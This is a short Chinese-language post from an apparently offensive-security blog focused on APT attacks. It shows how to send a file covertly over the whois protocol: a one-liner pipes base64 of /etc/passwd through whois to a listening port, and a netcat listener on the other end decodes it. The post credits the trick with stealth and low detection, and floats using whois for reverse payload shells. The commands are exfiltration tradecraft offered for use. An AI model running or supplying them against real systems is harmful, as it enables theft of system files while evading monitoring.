專注APT攻擊與防御
https://micropoor.blogspot.com/
利用whois傳輸文件:
傳輸機:
root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`
接受機:
root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d
優(yōu)點:適用于隱蔽傳輸。最小化被發(fā)現(xiàn)。
缺點:適用于傳輸小文件。
后者的話:whois是否同樣適用于payload的反彈,是一個非常有趣的實驗。
Micropoor